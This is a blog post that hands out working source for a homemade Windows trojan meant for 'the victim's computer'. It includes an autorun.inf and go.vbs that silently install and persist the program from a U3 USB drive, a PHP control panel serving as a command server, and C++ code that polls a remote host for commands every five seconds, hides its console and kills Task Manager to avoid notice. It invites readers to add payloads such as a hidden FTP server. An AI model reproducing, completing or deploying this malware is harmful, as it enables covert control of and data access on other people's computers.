Friday, 18 July 2014


Trojan In C++(One Of My Best)

 

I decided to post what I've created here. The trojan downloads 3 textfiles each 5 seconds, the textfiles contain a number, and based on that number it executes commands.

Before we start with the C++ code, I have a very easy way to get the trojan on the victim's computer. You just need a U3-enabled USB drive, USB access to the victim's computer, and the Universal Customizer. Delete the U3CUSTOM.ISO and create your own U3CUSTOM.ISO with these files included:

autorun.inf
CODE C Language
1 [AutoRun]
2 open=wscript go.vbs


go.vbs
CODE C Language
01 Dim FSO,File
02 Dim Date,Hour,Day,Backuppath,Daystring
03 Set FSO = CreateObject("Scripting.FileSystemObject")
04  
05 If Fso.FolderExists ("C:\Windows\trojan") Then
06    Set File= FSO.GetFile("C:\Windows\trojan\winrat.exe")
07    Date=File.DateLastModified
08    Day=DatePart("y",Date)
09    Daystring=CStr(Day)
10    Backuppath="C:\Windows\trojanbackup"+Daystring
11    Fso.MoveFolder "C:\Windows\trojan", Backuppath
12 End If
13  
14 FSO.CopyFolder ".\trojan", "c:\Windows\trojan", true
15  
16 Set oShell = CreateObject("WScript.Shell")
17 oShell.Run "C:\Windows\trojan\winrat.exe"
18  
19 If Fso.FolderExists ("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\") Then
20 If Fso.FileExists ("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Trojan.lnk") Then
21 Else
22    FSO.CopyFile "c:\Windows\trojan\Trojan.lnk","C:\Documents and Settings\All Users\Start Menu\Programs\Startup\", true
23 End If
24 End If
25  
26 wscript.quit


Then, create a folder "trojan", and we'll later put the trojan files in there. You also need to create a file "Trojan.lnk", it will be copied to the startup folder. Also place all the neccessary DLL's in there for the program to run, for example urlmon.dll and wininet.dll.


Then create an ISO and run the U3 Updater to put the trojan on your U3 drive. Now it will automatically run go.vbs without any notice once you plug in your U3 drive in any Windows XP computer (It will not work on Vista or 7, they have autorun disabled).





And also, before we start creating our program itself, we need a way to control it. As I said, the trojan downloads 3 files. Let's make these files on our web site/server. Create index.html, assign.html and target.html and don't put anything in there. Then we create a PHP file (edit.php) that is able to edit the html files. Why just PHP and not some normal application? Because this way we can control the trojan from anywhere by just going to yourwebsitehere.com/trojan/edit.php. You can even control computers with your mobile phone if you have mobile internet or Wifi.


<HTML>
<HEAD>
<TITLE>Winrat.exe Control Panel</TITLE>
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
</HEAD>
<BODY>
<?phpif (isset($_POST['submit'])) {

$myFile = "index.html";
$fh = fopen($myFile, 'w') or die("can't open file");
$stringData = stripslashes($_POST['option']);
fwrite($fh, $stringData);
fclose($fh);

$myFile2 = "target.html";
$fh = fopen($myFile2, 'w') or die("can't open file");
$stringData = stripslashes($_POST['target']);
fwrite($fh, $stringData);
fclose($fh);
}
if (isset($_POST['clear'])) {

$myFile = "index.html";
$fh = fopen($myFile, 'w') or die("can't open file");
$stringData = 0;
fwrite($fh, $stringData);
fclose($fh);
}
if (isset($_POST['assigncomputer'])) {

$myFile = "assign.html";
$fh = fopen($myFile, 'w') or die("can't open file");
$stringData = stripslashes($_POST['assign']);
fwrite($fh, $stringData);
fclose($fh);
}
?>
<div id="wrapper">
<form action="" method="post">
<textarea name="target" style="width: 230px; height: 25px; margin-bottom: 5px; font-size: 20px">
<?php
$myFile = "target.html";
$fh = fopen($myFile, 'r');
$theData = fgets($fh);
fclose($fh);
echo $theData;
?>
<br />
<textarea name="option" style="width: 230px; height: 60px; margin-bottom: 5px; font-size: 20px">
<?php
$myFile = "index.html";
$fh = fopen($myFile, 'r');
$theData = fgets($fh);
fclose($fh);
echo $theData;
?>
<br />
<input type="submit" name="submit" value="Edit" style="width: 150px; height: 40px" />
<input type="submit" name="clear" value="Clear" style="width: 65px; height: 40px" />
</form>
<?php
echo 'Current hack activated: <b>';

$myFile = "index.html";
$fh = fopen($myFile, 'r');
$theData = fgets($fh);
fclose($fh);
echo $theData;
?>
</b>
<br /><br \><b>1.</b> Just some<br /><b>2.</b> HTML code<br /><b>3.</b> to remember<br /><b>4.</b> what commands<br /><b>5.</b> you can use.<br /><br />
<form action="" method="post">
<textarea name="assign" style="width: 190px; height: 30px; margin-bottom: 2px; font-size: 20px">
<?php
$myFile = "assign.html";
$fh = fopen($myFile, 'r');
$theData = fgets($fh);
fclose($fh);
echo $theData;
?> <br />
<input type="submit" name="assigncomputer" value="Assign" style="width: 190px; height: 25px;" />
</form>
</div>




Now we start with creating our winrat.exe, the trojan itself. Here's the source code:


CODE C Language
001 #include <windows.h>
002 #pragma comment(lib, "Winmm.lib")
003 #include <urlmon.h>
004 #pragma comment(lib, "urlmon.lib")
005 #include <iostream>
006 #include <fstream>
007 #include <WinInet.h>
008 #pragma comment(lib, "WinInet.lib")
009 #include <ShlObj.h>
010 using namespace std;
011  
012 int Option, Assign, Target;
013 DWORD WINAPI LowProfile(LPVOID);
014 DWORD WINAPI Option1(LPVOID);
015 DWORD WINAPI Option2(LPVOID);
016 DWORD WINAPI Option3(LPVOID);
017 DWORD WINAPI Option4(LPVOID);
018 DWORD WINAPI Option5(LPVOID);
019 // Add more lines of Option6, Option7, etc. to create more commands.
020 HWND TaskMgr, SysError, WMP, Disk1, Disk2, Disk3, Disk4, Autoplay, VBS;
021  
022 int main() {
023 // Hide Console Window
024 FreeConsole();
025  
026 CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&LowProfile, 0, 0, NULL);
027  
028 // Checks if assign.txt exists. If it doesn't (only first run), download assign.txt. This gives the computer an ID number. You can change assign.txt in the PHP file BEFORE you plug in the U3 drive.
029 FILE *istream;
030 if ( (istream = fopen ( "C:\\Windows\\trojan\\assign.txt", "r" ) ) == NULL ) {
031     URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/assign.html", L"c:\\Windows\\trojan\\assign.txt", NULL, NULL);
032 } else {
033 }
034  
035 // Store Assign.txt in a variable
036 ifstream inAssign;
037 inAssign.clear();
038 inAssign.open("c:\\Windows\\trojan\\assign.txt");
039 inAssign >> Assign;
040 inAssign.close();
041 inAssign.clear();
042  
043 // Start the main loop that is downloading the textfile each 5 seconds.
044 while(1) {
045  
046     // Download Option & Target
047     remove("c:\\Windows\\trojan\\option.txt");
048     remove("c:\\Windows\\trojan\\target.txt");
049     DeleteUrlCacheEntry(L"http://www.yourwebsitehere.com/trojan/");
050     DeleteUrlCacheEntry(L"http://www.yourwebsitehere.com/trojan/target.html");
051     Sleep(100);
052     URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/", L"c:\\Windows\\trojan\\option.txt", NULL, NULL);
053     URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/target.html", L"c:\\Windows\\trojan\\target.txt", NULL, NULL);
054  
055     // Read Option
056     ifstream inFile;
057     inFile.clear();
058     inFile.open("c:\\Windows\\trojan\\option.txt");
059     inFile >> Option;
060     inFile.close();
061     inFile.clear();
062  
063     // Read Target
064     ifstream inTarget;
065     inTarget.clear();
066     inTarget.open("c:\\Windows\\trojan\\target.txt");
067     inTarget >> Target;
068     inTarget.close();
069     inTarget.clear();
070  
071     // If Target is equal to assign (so you can target a single computer) or if Target is zero (target all computers with your trojan)
072     if(Target == Assign || Target == 0) {
073         if(Option == 1) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option1, 0, 0, NULL); }
074         else if(Option == 2) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option2, 0, 0, NULL); }
075         else if(Option == 3) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option3, 0, 0, NULL); }
076         else if(Option == 4) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option4, 0, 0, NULL); }
077         else if(Option == 5) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option5, 0, 0, NULL); }
078         // Add more of these lines for more commands
079     }
080     Sleep(5000);
081     }
082 }
083  
084 // Our LowProfile Thread. Hides all errors and things that may popup while inserting your U3 drive.
085 DWORD WINAPI LowProfile(LPVOID) {
086     while(1) {
087         // Obvious
088         TaskMgr = FindWindow(NULL,L"Windows Task Manager");
089         // May popup because of new hardware installation (U3)
090         SysError = FindWindow(NULL,L"System Settings Change");
091         // Windows Media Player may popup. Rarely happens, but had this once at a school computer.
092         WMP = FindWindow(NULL,L"Windows Media Player");
093         // The Removable Disk part of the U3 Drive can open automatically.
094         Disk1 = FindWindow(NULL,L"(D:) Removable Disk");
095         Disk2 = FindWindow(NULL,L"(E:) Removable Disk");
096         Disk3 = FindWindow(NULL,L"(F:) Removable Disk");
097         Disk4 = FindWindow(NULL,L"(G:) Removable Disk");
098         // Autoplay
099         Autoplay = FindWindow(NULL,L"Autoplay");
100         // Errors caused by our VBScript go.vbs
101         VBS = FindWindow(NULL,L"Windows Script Host");
102         if( TaskMgr != NULL) {
103             SetWindowText( TaskMgr,L"DIE!!!! =O");
104             Sleep(500);
105             PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
106         }
107         if( SysError != NULL) {
108             PostMessage( SysError, WM_CLOSE, (LPARAM)0, (WPARAM)0);
109         }
110         if( WMP != NULL) {
111             Sleep(1000);
112             PostMessage( WMP, WM_CLOSE, (LPARAM)0, (WPARAM)0);
113         }
114         if( Disk1 != NULL) {
115             PostMessage( Disk1, WM_CLOSE, (LPARAM)0, (WPARAM)0);
116         }
117         if( Disk2 != NULL) {
118             PostMessage( Disk2, WM_CLOSE, (LPARAM)0, (WPARAM)0);
119         }
120         if( Disk3 != NULL) {
121             PostMessage( Disk3, WM_CLOSE, (LPARAM)0, (WPARAM)0);
122         }
123         if( Disk4 != NULL) {
124             PostMessage( Disk4, WM_CLOSE, (LPARAM)0, (WPARAM)0);
125         }
126         if( Autoplay != NULL) {
127             PostMessage( Autoplay, WM_CLOSE, (LPARAM)0, (WPARAM)0);
128         }
129         if( VBS != NULL) {
130             PostMessage( VBS, WM_CLOSE, (LPARAM)0, (WPARAM)0);
131         }
132         Sleep(500);
133     }
134 }
135  
136 //
137 // Here we start with our commands. Option1, Option2, Option3, etc.
138 // Don't forget to also define and create a process for these Options if you want to create more.
139 // Have Fun =D
140 //
141  
142 DWORD WINAPI Option1(LPVOID) { // 1
143     return 0;
144 }
145  
146 DWORD WINAPI Option2(LPVOID) { // 2
147     return 0;
148 }
149  
150 DWORD WINAPI Option3(LPVOID) { // 3
151     return 0;
152 }
153  
154 DWORD WINAPI Option4(LPVOID) { // 4
155     return 0;
156 }
157  
158 DWORD WINAPI Option5(LPVOID) { // 5
159     return 0;
160 }


That's our trojan. But it doesn't have any commands. You can do anything you want now. Run an FTP server in the background (I recommend SlimFTPd), open websites or applications, play a sound, open your CD drive, etc.
Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)